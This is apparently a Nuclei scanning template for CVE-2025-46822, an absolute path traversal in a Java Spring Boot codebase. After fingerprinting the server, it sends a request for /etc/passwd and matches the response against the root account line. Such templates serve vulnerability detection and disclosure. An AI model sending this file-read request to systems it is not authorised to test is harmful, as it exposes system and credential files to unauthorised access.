CVE-2025-46822: Java-springboot-codebase 1.1 - Arbitrary File Read

id: CVE-2025-46822

info:
  name: Java-springboot-codebase 1.1 - Arbitrary File Read
  author: haliteroglu25
  severity: high
  description: |
    OsamaTaher/Java-springboot-codebase is a collection of Java and Spring Boot code snippets, applications, and projects. Prior to commit c835c6f7799eacada4c0fc77e0816f250af01ad2, insufficient path traversal mechanisms make absolute path traversal possible. This vulnerability allows unauthorized access to sensitive internal files. Commit c835c6f7799eacada4c0fc77e0816f250af01ad2 contains a patch for the issue.
  reference:
    - https://github.com/OsamaTaher/Java-springboot-codebase
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46822
    - https://github.com/OsamaTaher/Java-springboot-codebase/security/advisories/GHSA-q6mm-cm37-w637
    - https://github.com/OsamaTaher/Java-springboot-codebase/commit/c835c6f7799eacada4c0fc77e0816f250af01ad2
    - https://github.com/PuddinCat/GithubRepoSpider
  classification:
    epss-score: 0.14383
    epss-percentile: 0.94196
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,java,springboot,codebase,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "Whitelabel Error Page","explicit mapping")'
        internal: true

  - raw:
      - |
        GET /api/v1/files/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402200cee10d58e8da28404ac6f2a558dd68b3b1e47ccd959cae471169626dc04b52c022070cba7179b19efc57eae7cc69220c74aac826b963f79365cb451a444e4300f7e:922c64590222798bb761d5b6d8e72950